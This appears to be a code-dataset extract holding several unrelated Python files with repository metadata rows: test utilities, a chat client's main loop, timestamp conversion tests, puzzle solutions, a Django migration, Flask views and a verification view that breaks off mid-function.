with self.assertRaisesRegexp(Exception, 'already associated'):
self.stub.associate_multi_auth_ids_with_user_ids(
[auth_domain.AuthIdUserIdPair('aid1', 'uid1'),
auth_domain.AuthIdUserIdPair('aid2', 'uid2'),
auth_domain.AuthIdUserIdPair('aid3', 'uid3')])
def test_present_association_is_not_considered_to_be_deleted(self):
self.stub.associate_auth_id_with_user_id(
auth_domain.AuthIdUserIdPair('aid', 'uid'))
self.assertFalse(
self.stub.verify_external_auth_associations_are_deleted('uid'))
def test_missing_association_is_considered_to_be_deleted(self):
self.assertTrue(self.stub.verify_external_auth_associations_are_deleted(
'does_not_exist'))
def test_delete_association_when_it_is_present(self):
self.stub.associate_auth_id_with_user_id(auth_domain.AuthIdUserIdPair(
'aid', 'uid'))
self.assertFalse(
self.stub.verify_external_auth_associations_are_deleted('uid'))
self.stub.delete_external_auth_associations('uid')
self.assertTrue(
self.stub.verify_external_auth_associations_are_deleted('uid'))
def test_delete_association_when_it_is_missing_does_not_raise(self):
self.stub.delete_external_auth_associations('does_not_exist')
class CallCounterTests(test_utils.GenericTestBase):
def test_call_counter_counts_the_number_of_times_a_function_gets_called(
self):
f = lambda x: x ** 2
wrapped_function = test_utils.CallCounter(f)
self.assertEqual(wrapped_function.times_called, 0)
for i in python_utils.RANGE(5):
self.assertEqual(wrapped_function(i), i ** 2)
self.assertEqual(wrapped_function.times_called, i + 1)
class FailingFunctionTests(test_utils.GenericTestBase):
def test_failing_function_never_succeeds_when_n_is_infinity(self):
class MockError(Exception):
pass
function = lambda x: x ** 2
failing_func = test_utils.FailingFunction(
function, MockError('Dummy Exception'),
test_utils.FailingFunction.INFINITY)
for i in python_utils.RANGE(20):
with self.assertRaisesRegexp(MockError, 'Dummy Exception'):
failing_func(i)
def test_failing_function_raises_error_with_invalid_num_tries(self):
class MockError(Exception):
pass
function = lambda x: x ** 2
with self.assertRaisesRegexp(
ValueError,
'num_tries_before_success should either be an integer greater than '
'or equal to 0, or FailingFunction.INFINITY'):
test_utils.FailingFunction(function, MockError, -1)
class FailingMapReduceJobManager(jobs.BaseMapReduceJobManager):
@classmethod
def entity_classes_to_map_over(cls):
return []
@classmethod
def map(cls):
pass
class TestUtilsTests(test_utils.GenericTestBase):
def test_failing_job(self):
self.assertIsNone(FailingMapReduceJobManager.map())
job_id = FailingMapReduceJobManager.create_new()
FailingMapReduceJobManager.enqueue(
job_id, taskqueue_services.QUEUE_NAME_DEFAULT)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(None), 1)
self.assertRaisesRegexp(
RuntimeError, 'MapReduce task failed: Task<.*>',
self.process_and_flush_pending_mapreduce_tasks)
def test_get_static_asset_url(self):
asset_url = self.get_static_asset_url('/images/subjects/Lightbulb.svg')
self.assertEqual(asset_url, '/assets/images/subjects/Lightbulb.svg')
def test_get_static_asset_filepath_with_prod_mode_on(self):
with self.swap(constants, 'DEV_MODE', False):
filepath = self.get_static_asset_filepath()
self.assertEqual(filepath, 'build')
def test_cannot_get_updated_param_dict_with_invalid_param_name(self):
param_change_list = [
param_domain.ParamChange(
'a', 'Copier', {
'value': 'firstValue', 'parse_with_jinja': False
}
)
]
exp_param_specs = {
'b': param_domain.ParamSpec('UnicodeString'),
}
with self.assertRaisesRegexp(Exception, 'Parameter a not found'):
self.get_updated_param_dict(
{}, param_change_list, exp_param_specs)
def test_cannot_save_new_linear_exp_with_no_state_name(self):
with self.assertRaisesRegexp(
ValueError, 'must provide at least one state name'):
self.save_new_linear_exp_with_state_names_and_interactions(
'exp_id', 'owner_id', [], ['interaction_id'])
def test_cannot_save_new_linear_exp_with_no_interaction_id(self):
with self.assertRaisesRegexp(
ValueError, 'must provide at least one interaction type'):
self.save_new_linear_exp_with_state_names_and_interactions(
'exp_id', 'owner_id', ['state_name'], [])
def test_cannot_perform_delete_json_with_non_dict_params(self):
with self.assertRaisesRegexp(
Exception, 'Expected params to be a dict'):
self.delete_json('random_url', params='invalid_params')
def test_cannot_get_response_with_non_dict_params(self):
with self.assertRaisesRegexp(
Exception, 'Expected params to be a dict'):
self.get_response_without_checking_for_errors(
'random_url', [200], params='invalid_params')
def test_capture_logging(self):
logging.info('0')
with self.capture_logging() as logs:
logging.info('1')
logging.debug('2')
logging.warn('3')
logging.error('4')
python_utils.PRINT('5')
logging.info('6')
self.assertEqual(logs, ['1', '2', '3', '4'])
def test_capture_logging_with_min_level(self):
logging.info('0')
with self.capture_logging(min_level=logging.WARN) as logs:
logging.info('1')
logging.debug('2')
logging.warn('3')
logging.error('4')
python_utils.PRINT('5')
logging.error('6')
self.assertEqual(logs, ['3', '4'])
def test_swap_to_always_return_without_value_uses_none(self):
obj = mock.Mock()
obj.func = lambda: obj
self.assertIs(obj.func(), obj)
with self.swap_to_always_return(obj, 'func'):
self.assertIsNone(obj.func())
def test_swap_to_always_return_with_value(self):
obj = mock.Mock()
obj.func = lambda: 0
self.assertEqual(obj.func(), 0)
with self.swap_to_always_return(obj, 'func', value=123):
self.assertEqual(obj.func(), 123)
def test_swap_to_always_raise_without_error_uses_empty_exception(self):
obj = mock.Mock()
obj.func = lambda: None
self.assertIsNone(obj.func())
with self.swap_to_always_raise(obj, 'func'):
try:
obj.func()
except Exception as e:
self.assertIs(type(e), Exception)
self.assertEqual(python_utils.UNICODE(e), '')
else:
self.fail(msg='obj.func() did not raise an Exception')
def test_swap_to_always_raise_with_error(self):
obj = mock.Mock()
obj.func = lambda: python_utils.divide(1, 0)
self.assertRaisesRegexp(
ZeroDivisionError, 'integer division or modulo by zero', obj.func)
with self.swap_to_always_raise(obj, 'func', error=ValueError('abc')):
self.assertRaisesRegexp(ValueError, 'abc', obj.func)
def test_swap_with_check_on_method_called(self):
def mock_getcwd():
return
getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
with getcwd_swap:
SwapWithCheckTestClass.getcwd_function_without_args()
def test_swap_with_check_on_called_failed(self):
def mock_getcwd():
return
getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
with self.assertRaisesRegexp(AssertionError, r'os\.getcwd'):
with getcwd_swap:
SwapWithCheckTestClass.empty_function_without_args()
def test_swap_with_check_on_not_called(self):
def mock_getcwd():
return
getcwd_swap = self.swap_with_checks(
os, 'getcwd', mock_getcwd, called=False)
with getcwd_swap:
SwapWithCheckTestClass.empty_function_without_args()
def test_swap_with_check_on_not_called_failed(self):
def mock_getcwd():
return
getcwd_swap = self.swap_with_checks(
os, 'getcwd', mock_getcwd)
with self.assertRaisesRegexp(AssertionError, r'os\.getcwd'):
with getcwd_swap:
SwapWithCheckTestClass.empty_function_without_args()
def test_swap_with_check_on_expected_args(self):
def mock_getenv(unused_env):
return
def mock_join(*unused_args):
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv, expected_args=[('123',), ('456',)])
join_swap = self.swap_with_checks(
os.path, 'join', mock_join, expected_args=[('first', 'second')])
with getenv_swap, join_swap:
SwapWithCheckTestClass.functions_with_args()
def test_swap_with_check_on_expected_args_failed_on_run_sequence(self):
def mock_getenv(unused_env):
return
def mock_join(*unused_args):
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv, expected_args=[('456',), ('123',)])
join_swap = self.swap_with_checks(
os.path, 'join', mock_join, expected_args=[('first', 'second')])
with self.assertRaisesRegexp(AssertionError, r'os\.getenv'):
with getenv_swap, join_swap:
SwapWithCheckTestClass.functions_with_args()
def test_swap_with_check_on_expected_args_failed_on_wrong_args_number(self):
def mock_getenv(unused_env):
return
def mock_join(*unused_args):
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv, expected_args=[('123',), ('456',)])
join_swap = self.swap_with_checks(
os.path, 'join', mock_join, expected_args=[
('first', 'second'), ('third', 'forth')])
with self.assertRaisesRegexp(AssertionError, r'join'):
with getenv_swap, join_swap:
SwapWithCheckTestClass.functions_with_args()
def test_swap_with_check_on_expected_kwargs(self):
def mock_getenv(key, default):
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv,
expected_args=[('123',), ('678',)],
expected_kwargs=[{'default': '456'}, {'default': '900'}])
with getenv_swap:
SwapWithCheckTestClass.functions_with_kwargs()
def test_swap_with_check_on_expected_kwargs_failed_on_wrong_numbers(self):
def mock_getenv(key, default):
return
getenv_swap = self.swap_with_checks(
os, 'getenv', mock_getenv, expected_kwargs=[
{'key': '123', 'default': '456'},
{'key': '678', 'default': '900'},
{'key': '678', 'default': '900'},
])
with self.assertRaisesRegexp(AssertionError, r'os\.getenv'):
with getenv_swap:
SwapWithCheckTestClass.functions_with_kwargs()
def test_swap_with_check_on_capature_exception_raised_by_tested_function(
self):
def mock_getcwd():
raise ValueError('Exception raised from getcwd()')
getcwd_swap = self.swap_with_checks(os, 'getcwd', mock_getcwd)
with self.assertRaisesRegexp(
ValueError, re.escape('Exception raised from getcwd()')
):
with getcwd_swap:
SwapWithCheckTestClass.getcwd_function_without_args()
def test_assert_raises_with_error_message(self):
def mock_exception_func():
raise Exception()
with self.assertRaisesRegexp(
NotImplementedError,
'self.assertRaises should not be used in these tests. Please use '
'self.assertRaisesRegexp instead.'):
self.assertRaises(Exception, mock_exception_func)
def test_assert_raises_regexp_with_empty_string(self):
def mock_exception_func():
raise Exception()
with self.assertRaisesRegexp(
Exception,
'Please provide a sufficiently strong regexp string to '
'validate that the correct error is being raised.'):
self.assertRaisesRegexp(Exception, '', mock_exception_func)
class EmailMockTests(test_utils.EmailTestBase):
def test_override_run_swaps_contexts(self):
referenced_function = getattr(
email_services, 'send_email_to_recipients')
correct_function = getattr(self, '_send_email_to_recipients')
self.assertEqual(referenced_function, correct_function)
def test_mock_send_email_to_recipients_sends_correct_emails(self):
self._send_email_to_recipients(
'a@a.com',
['b@b.com'],
(
'Hola 😂 - invitation to collaborate'
.encode(encoding='utf-8')),
'plaintext_body 😂'.encode(encoding='utf-8'),
'Hi abc,<br> 😂'.encode(encoding='utf-8'),
bcc=['c@c.com'],
reply_to='abc',
recipient_variables={'b@b.com': {'first': 'Bob', 'id': 1}})
messages = self._get_sent_email_messages(
'b@b.com')
all_messages = self._get_all_sent_email_messages()
self.assertEqual(len(messages), 1)
self.assertEqual(len(all_messages), 1)
self.assertEqual(all_messages['b@b.com'], messages)
self.assertEqual(
messages[0].subject,
'Hola 😂 - invitation to collaborate'.encode(encoding='utf-8'))
self.assertEqual(
messages[0].body,
'plaintext_body 😂'.encode(encoding='utf-8'))
self.assertEqual(
messages[0].html,
'Hi abc,<br> 😂'.encode(encoding='utf-8'))
self.assertEqual(messages[0].bcc, 'c@c.com')
class SwapWithCheckTestClass(python_utils.OBJECT):
@classmethod
def getcwd_function_without_args(cls):
os.getcwd()
@classmethod
def empty_function_without_args(cls):
pass
@classmethod
def functions_with_args(cls):
os.getenv('123')
os.getenv('456')
os.path.join('first', 'second')
@classmethod
def functions_with_kwargs(cls):
os.getenv('123', default='456')
os.getenv('678', default='900')
| true | true |
f722ff12e66d16156c8166bda9a96d2df4ee4890 | 1,298 | py | Python | nuqql/main.py | hwipl/nuqql | 410ea5bd42e455d656b1b34612c3b0d5a0b433ef | [
"MIT"
] | 3 | 2019-04-15T18:33:36.000Z | 2019-04-21T19:18:10.000Z | nuqql/main.py | hwipl/nuqql | 410ea5bd42e455d656b1b34612c3b0d5a0b433ef | [
"MIT"
] | 15 | 2019-04-15T18:35:56.000Z | 2019-09-14T08:24:32.000Z | nuqql/main.py | hwipl/nuqql | 410ea5bd42e455d656b1b34612c3b0d5a0b433ef | [
"MIT"
] | 1 | 2019-06-16T12:00:30.000Z | 2019-06-16T12:00:30.000Z | """
Main part of nuqql.
"""
import logging
import os
import signal
import nuqql.backend
import nuqql.config
import nuqql.ui
logger = logging.getLogger(__name__)
# main loop of nuqql
def main_loop() -> str:
"""
Main loop of nuqql.
"""
logger.debug("entering main loop")
try:
# init and start all backends
nuqql.backend.start_backends()
# loop as long as user does not quit
while nuqql.ui.handle_input():
# update buddies
nuqql.backend.update_buddies()
# handle network input
nuqql.backend.handle_network()
finally:
# shut down backends
nuqql.backend.stop_backends()
# quit nuqql
return ""
def _set_esc_delay() -> None:
"""
Configure ESC delay for curses
"""
os.environ.setdefault("ESCDELAY", nuqql.config.get("escdelay"))
# main entry point
def run() -> None:
"""
Main entry point of nuqql
"""
# does not go to nuqql log file
logger.debug("starting nuqql")
# parse command line arguments
nuqql.config.parse_args()
# ignore SIGINT
signal.signal(signal.SIGINT, signal.SIG_IGN)
# configure esc delay for curses
_set_esc_delay()
# initialize ui and run main_loop
nuqql.ui.init(main_loop)
| 18.542857 | 67 | 0.62943 |
import logging
import os
import signal
import nuqql.backend
import nuqql.config
import nuqql.ui
logger = logging.getLogger(__name__)
def main_loop() -> str:
logger.debug("entering main loop")
try:
nuqql.backend.start_backends()
while nuqql.ui.handle_input():
nuqql.backend.update_buddies()
nuqql.backend.handle_network()
finally:
nuqql.backend.stop_backends()
return ""
def _set_esc_delay() -> None:
os.environ.setdefault("ESCDELAY", nuqql.config.get("escdelay"))
def run() -> None:
logger.debug("starting nuqql")
nuqql.config.parse_args()
signal.signal(signal.SIGINT, signal.SIG_IGN)
_set_esc_delay()
nuqql.ui.init(main_loop)
| true | true |
f722ff3452399253037f413b93a7d0b032a1be3d | 672 | py | Python | tests/test_main.py | jleclanche/filetime | 4e3f7925e04713a507adcfe7e8a3ef20601ef5e4 | [
"CC0-1.0"
] | 3 | 2019-05-27T07:19:11.000Z | 2021-12-13T10:43:19.000Z | tests/test_main.py | jleclanche/filetime | 4e3f7925e04713a507adcfe7e8a3ef20601ef5e4 | [
"CC0-1.0"
] | null | null | null | tests/test_main.py | jleclanche/filetime | 4e3f7925e04713a507adcfe7e8a3ef20601ef5e4 | [
"CC0-1.0"
] | null | null | null | from datetime import datetime
from filetime import from_datetime, to_datetime, utc
def test_from_datetime():
assert from_datetime(datetime(2009, 7, 25, 23, 0)) == 128930364000000000
assert from_datetime(datetime(1970, 1, 1, 0, 0, tzinfo=utc)) == 116444736000000000
assert from_datetime(datetime(1970, 1, 1, 0, 0)) == 116444736000000000
assert from_datetime(datetime(2009, 7, 25, 23, 0, 0, 100)) == 128930364000001000
def test_to_datetime():
assert to_datetime(116444736000000000) == datetime(1970, 1, 1, 0, 0)
assert to_datetime(128930364000000000) == datetime(2009, 7, 25, 23, 0)
assert to_datetime(128930364000001000) == datetime(2009, 7, 25, 23, 0, 0, 100)
| 39.529412 | 83 | 0.745536 | from datetime import datetime
from filetime import from_datetime, to_datetime, utc
def test_from_datetime():
assert from_datetime(datetime(2009, 7, 25, 23, 0)) == 128930364000000000
assert from_datetime(datetime(1970, 1, 1, 0, 0, tzinfo=utc)) == 116444736000000000
assert from_datetime(datetime(1970, 1, 1, 0, 0)) == 116444736000000000
assert from_datetime(datetime(2009, 7, 25, 23, 0, 0, 100)) == 128930364000001000
def test_to_datetime():
assert to_datetime(116444736000000000) == datetime(1970, 1, 1, 0, 0)
assert to_datetime(128930364000000000) == datetime(2009, 7, 25, 23, 0)
assert to_datetime(128930364000001000) == datetime(2009, 7, 25, 23, 0, 0, 100)
| true | true |
f722ffb63bb529cdb1455c71ea254e0a5d9284e9 | 1,988 | py | Python | day3/solution.py | hejnal/advent-of-code | bc16ea8f34914a5c384705cf41784e85ba145e78 | [
"Apache-2.0"
] | null | null | null | day3/solution.py | hejnal/advent-of-code | bc16ea8f34914a5c384705cf41784e85ba145e78 | [
"Apache-2.0"
] | null | null | null | day3/solution.py | hejnal/advent-of-code | bc16ea8f34914a5c384705cf41784e85ba145e78 | [
"Apache-2.0"
] | null | null | null | #!/bin/python
def is_valid_triangle(edges):
assert len(edges) == 3, "input should have 3 edges"
if edges[0] + edges[1] > edges[2] and edges[0] + edges[2] > edges[1] and edges[1] + edges[2] > edges[0]:
return True
else:
return False
def main():
response = is_valid_triangle([5, 10, 25])
assert response == False, "it should be 0"
response = is_valid_triangle([4, 5, 7])
assert response == True, "it should be 1"
# part 1
num_triangles = 0
with open("input.txt", "r") as f:
while True:
line = f.readline()
if line == "\n" or line == "":
break
edges = list(map(lambda x: int(x), line.strip().split()))
num_triangles = num_triangles + (1 if is_valid_triangle(edges) else 0)
print("Part1: Total number of triangles is: {}".format(num_triangles))
# part 2
num_triangles = 0
processed_edges = []
with open("input.txt", "r") as f:
while True:
line = f.readline()
processed_edges.append(list(map(lambda x: int(x), line.strip().split())))
if line == "\n" or line == "":
break
if (len(processed_edges) % 3 == 0):
edges_first = [processed_edges[0][0], processed_edges[1][0], processed_edges[2][0]]
edges_second = [processed_edges[0][1], processed_edges[1][1], processed_edges[2][1]]
edges_third = [processed_edges[0][2], processed_edges[1][2], processed_edges[2][2]]
num_triangles = num_triangles + (1 if is_valid_triangle(edges_first) else 0)
num_triangles = num_triangles + (1 if is_valid_triangle(edges_second) else 0)
num_triangles = num_triangles + (1 if is_valid_triangle(edges_third) else 0)
processed_edges = []
print("Part2: Total number of triangles is: {}".format(num_triangles))
if __name__ == "__main__":
main() | 32.064516 | 108 | 0.572938 |
def is_valid_triangle(edges):
assert len(edges) == 3, "input should have 3 edges"
if edges[0] + edges[1] > edges[2] and edges[0] + edges[2] > edges[1] and edges[1] + edges[2] > edges[0]:
return True
else:
return False
def main():
response = is_valid_triangle([5, 10, 25])
assert response == False, "it should be 0"
response = is_valid_triangle([4, 5, 7])
assert response == True, "it should be 1"
num_triangles = 0
with open("input.txt", "r") as f:
while True:
line = f.readline()
if line == "\n" or line == "":
break
edges = list(map(lambda x: int(x), line.strip().split()))
num_triangles = num_triangles + (1 if is_valid_triangle(edges) else 0)
print("Part1: Total number of triangles is: {}".format(num_triangles))
num_triangles = 0
processed_edges = []
with open("input.txt", "r") as f:
while True:
line = f.readline()
processed_edges.append(list(map(lambda x: int(x), line.strip().split())))
if line == "\n" or line == "":
break
if (len(processed_edges) % 3 == 0):
edges_first = [processed_edges[0][0], processed_edges[1][0], processed_edges[2][0]]
edges_second = [processed_edges[0][1], processed_edges[1][1], processed_edges[2][1]]
edges_third = [processed_edges[0][2], processed_edges[1][2], processed_edges[2][2]]
num_triangles = num_triangles + (1 if is_valid_triangle(edges_first) else 0)
num_triangles = num_triangles + (1 if is_valid_triangle(edges_second) else 0)
num_triangles = num_triangles + (1 if is_valid_triangle(edges_third) else 0)
processed_edges = []
print("Part2: Total number of triangles is: {}".format(num_triangles))
if __name__ == "__main__":
main() | true | true |
f7230013f9c80b482251c11ef79e9fb011a259bc | 973 | py | Python | pretalx_youtube/migrations/0001_initial.py | pretalx/pretalx-youtube | f5a5ae9c9c2d9e3e1e2bb4a6d3e18e970449a96b | [
"Apache-2.0"
] | 1 | 2022-02-09T21:47:34.000Z | 2022-02-09T21:47:34.000Z | pretalx_youtube/migrations/0001_initial.py | pretalx/pretalx-youtube | f5a5ae9c9c2d9e3e1e2bb4a6d3e18e970449a96b | [
"Apache-2.0"
] | 1 | 2022-03-09T18:32:10.000Z | 2022-03-09T18:32:10.000Z | pretalx_youtube/migrations/0001_initial.py | pretalx/pretalx-youtube | f5a5ae9c9c2d9e3e1e2bb4a6d3e18e970449a96b | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.2.4 on 2021-12-15 01:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
("submission", "0062_cfp_settings_data"),
]
operations = [
migrations.CreateModel(
name="YouTubeLink",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False
),
),
("video_id", models.CharField(max_length=20)),
(
"submission",
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE,
related_name="youtube_link",
to="submission.submission",
),
),
],
),
]
| 26.297297 | 76 | 0.458376 |
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
("submission", "0062_cfp_settings_data"),
]
operations = [
migrations.CreateModel(
name="YouTubeLink",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False
),
),
("video_id", models.CharField(max_length=20)),
(
"submission",
models.OneToOneField(
on_delete=django.db.models.deletion.CASCADE,
related_name="youtube_link",
to="submission.submission",
),
),
],
),
]
| true | true |
f723014eabd8d19ad1683343d7ed261670ddb067 | 545 | py | Python | papery/site/views.py | radonlab/papery | 1ec8d844adb8cc76cd9ca86a7e5b13a2d1f8967a | [
"MIT"
] | null | null | null | papery/site/views.py | radonlab/papery | 1ec8d844adb8cc76cd9ca86a7e5b13a2d1f8967a | [
"MIT"
] | null | null | null | papery/site/views.py | radonlab/papery | 1ec8d844adb8cc76cd9ca86a7e5b13a2d1f8967a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Copyright (C) 2015, Radmon.
Use of this source code is governed by the MIT license that can be
found in the LICENSE file.
"""
from flask import render_template
from ..auth import auth
from ..blog import blog
def index():
return render_template('site/index.html')
def about():
return render_template('site/about.html')
def init_app(app):
app.add_url_rule('/', 'site.index', index)
app.add_url_rule('/about', 'site.about', about)
app.register_blueprint(auth)
app.register_blueprint(blog)
| 20.961538 | 66 | 0.699083 |
from flask import render_template
from ..auth import auth
from ..blog import blog
def index():
return render_template('site/index.html')
def about():
return render_template('site/about.html')
def init_app(app):
app.add_url_rule('/', 'site.index', index)
app.add_url_rule('/about', 'site.about', about)
app.register_blueprint(auth)
app.register_blueprint(blog)
| true | true |
f72301b2c63fbdc40c6edfa65c2949f6ab6b9a05 | 1,352 | py | Python | prover.py | hv10/reverseengineering1819 | caf9d9f3d5fc685c062378ebd1a92a8cdd4032e6 | [
"MIT"
] | 1 | 2019-12-01T18:22:20.000Z | 2019-12-01T18:22:20.000Z | prover.py | hv10/reverseengineering1819 | caf9d9f3d5fc685c062378ebd1a92a8cdd4032e6 | [
"MIT"
] | null | null | null | prover.py | hv10/reverseengineering1819 | caf9d9f3d5fc685c062378ebd1a92a8cdd4032e6 | [
"MIT"
] | 1 | 2019-03-14T09:52:16.000Z | 2019-03-14T09:52:16.000Z | import unittest
from functools import wraps
def score_with(score):
def decorator(fn):
def decorated(*args,**kwargs):
ret = fn(*args,**kwargs)
if ret:
args[0].__class__._increase_score(score)
return ret
return decorated
return decorator
class Prover():
"""
Inherit from me to score a testing scenario.
Decorate a test_case with "@score_with(amount)" to track
the points generated!
All functions with "test" in the beginning of the signature
will be evaluated upon calling .run() of the instance.
A child-class should only track points for a _single_ scenario!
"""
def __init__(self,*args,**kwargs):
self.__class__.score = 0
@classmethod
def _increase_score(cls,scr):
cls.score += scr
def run(self, *args,**kwargs):
public_method_names = [
method for method in dir(self)
if callable(getattr(self, method))
if method.startswith('test')
] # 'private' methods start from _
for method in public_method_names:
print(method)
getattr(self, method)()
print("Points reached: ",self.__class__.score)
return self.score
if __name__=="__main__":
Prover()
| 28.166667 | 68 | 0.588757 | import unittest
from functools import wraps
def score_with(score):
def decorator(fn):
def decorated(*args,**kwargs):
ret = fn(*args,**kwargs)
if ret:
args[0].__class__._increase_score(score)
return ret
return decorated
return decorator
class Prover():
def __init__(self,*args,**kwargs):
self.__class__.score = 0
@classmethod
def _increase_score(cls,scr):
cls.score += scr
def run(self, *args,**kwargs):
public_method_names = [
method for method in dir(self)
if callable(getattr(self, method))
if method.startswith('test')
]
for method in public_method_names:
print(method)
getattr(self, method)()
print("Points reached: ",self.__class__.score)
return self.score
if __name__=="__main__":
Prover()
| true | true |
f72301c71bd7efaf6b7a84fe61d922d45b74dd15 | 551 | py | Python | mapping/model/jeffreys.py | syanga/model-augmented-mutual-information | a7c0ccb3b32320e9c45c266d668a879e240d39e3 | [
"MIT"
] | 2 | 2021-06-10T05:45:16.000Z | 2021-11-06T11:44:42.000Z | mapping/model/jeffreys.py | syanga/model-augmented-mutual-information | a7c0ccb3b32320e9c45c266d668a879e240d39e3 | [
"MIT"
] | null | null | null | mapping/model/jeffreys.py | syanga/model-augmented-mutual-information | a7c0ccb3b32320e9c45c266d668a879e240d39e3 | [
"MIT"
] | null | null | null | """ Jeffreys divergences """
import torch
def jeffreys_normal(mu1, lv1, mu2, lv2):
mu1, lv1 = mu1.view(mu1.shape[0], -1), lv1.view(lv1.shape[0], -1)
mu2, lv2 = mu2.view(mu2.shape[0], -1), lv2.view(lv2.shape[0], -1)
return (0.25*((-lv1).exp() + (-lv2).exp())*(mu1-mu2)**2 + 0.25*((lv1-lv2).exp() + (lv2-lv1).exp()) - 0.5).sum(dim=1)
def jeffreys_bernoulli(p, q, eps=1e-5):
p = p.view(p.shape[0], -1)*(1.-2.*eps)+eps
q = q.view(q.shape[0], -1)*(1.-2.*eps)+eps
return 0.5*(p-q)*(p.log() - q.log() - (1-p).log() + (1-q).log())
| 36.733333 | 120 | 0.54265 | import torch
def jeffreys_normal(mu1, lv1, mu2, lv2):
mu1, lv1 = mu1.view(mu1.shape[0], -1), lv1.view(lv1.shape[0], -1)
mu2, lv2 = mu2.view(mu2.shape[0], -1), lv2.view(lv2.shape[0], -1)
return (0.25*((-lv1).exp() + (-lv2).exp())*(mu1-mu2)**2 + 0.25*((lv1-lv2).exp() + (lv2-lv1).exp()) - 0.5).sum(dim=1)
def jeffreys_bernoulli(p, q, eps=1e-5):
p = p.view(p.shape[0], -1)*(1.-2.*eps)+eps
q = q.view(q.shape[0], -1)*(1.-2.*eps)+eps
return 0.5*(p-q)*(p.log() - q.log() - (1-p).log() + (1-q).log())
| true | true |
f723022a8a5c862ecf4cb3104f070a25c4cbcdc8 | 2,101 | py | Python | tests/models/v2/rule_test.py | NetApp/santricity-webapi-pythonsdk | 1d3df4a00561192f4cdcdd1890f4d27547ed2de2 | [
"BSD-3-Clause-Clear"
] | 5 | 2016-08-23T17:52:22.000Z | 2019-05-16T08:45:30.000Z | tests/models/v2/rule_test.py | NetApp/santricity-webapi-pythonsdk | 1d3df4a00561192f4cdcdd1890f4d27547ed2de2 | [
"BSD-3-Clause-Clear"
] | 2 | 2016-11-10T05:30:21.000Z | 2019-04-05T15:03:37.000Z | tests/models/v2/rule_test.py | NetApp/santricity-webapi-pythonsdk | 1d3df4a00561192f4cdcdd1890f4d27547ed2de2 | [
"BSD-3-Clause-Clear"
] | 7 | 2016-08-25T16:11:44.000Z | 2021-02-22T05:31:25.000Z | #!/usr/bin/env python
# coding: utf-8
"""
The Clear BSD License
Copyright (c) – 2016, NetApp, Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import unittest
from netapp.santricity.models.v2.rule import Rule
class RuleTest(unittest.TestCase):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
# Try instantiating the model
def test_rule(self):
rule_obj = Rule()
self.assertNotEqual(rule_obj, None)
| 55.289474 | 845 | 0.764874 |
import unittest
from netapp.santricity.models.v2.rule import Rule
class RuleTest(unittest.TestCase):
def test_rule(self):
rule_obj = Rule()
self.assertNotEqual(rule_obj, None)
| true | true |
f72302a14d482273d46aa7948834d33039045a14 | 3,594 | py | Python | app/main/views/verify.py | alphagov/notify-admin-frontend | 70f2a6a97aefe2432d7a3b54dc1555c030dd3693 | [
"MIT"
] | null | null | null | app/main/views/verify.py | alphagov/notify-admin-frontend | 70f2a6a97aefe2432d7a3b54dc1555c030dd3693 | [
"MIT"
] | null | null | null | app/main/views/verify.py | alphagov/notify-admin-frontend | 70f2a6a97aefe2432d7a3b54dc1555c030dd3693 | [
"MIT"
] | null | null | null | import json
from flask import (
abort,
current_app,
flash,
redirect,
render_template,
session,
url_for,
)
from itsdangerous import SignatureExpired
from notifications_utils.url_safe_token import check_token
from app import user_api_client
from app.main import main
from app.main.forms import TwoFactorForm
from app.models.service import Service
from app.models.user import InvitedOrgUser, InvitedUser, User
from app.utils.login import redirect_to_sign_in
@main.route('/verify', methods=['GET', 'POST'])
@redirect_to_sign_in
def verify():
user_id = session['user_details']['id']
def _check_code(code):
return user_api_client.check_verify_code(user_id, code, 'sms')
form = TwoFactorForm(_check_code)
if form.validate_on_submit():
session.pop('user_details', None)
return activate_user(user_id)
return render_template('views/two-factor-sms.html', form=form)
@main.route('/verify-email/<token>')
def verify_email(token):
try:
token_data = check_token(
token,
current_app.config['SECRET_KEY'],
current_app.config['DANGEROUS_SALT'],
current_app.config['EMAIL_EXPIRY_SECONDS']
)
except SignatureExpired:
flash("The link in the email we sent you has expired. We've sent you a new one.")
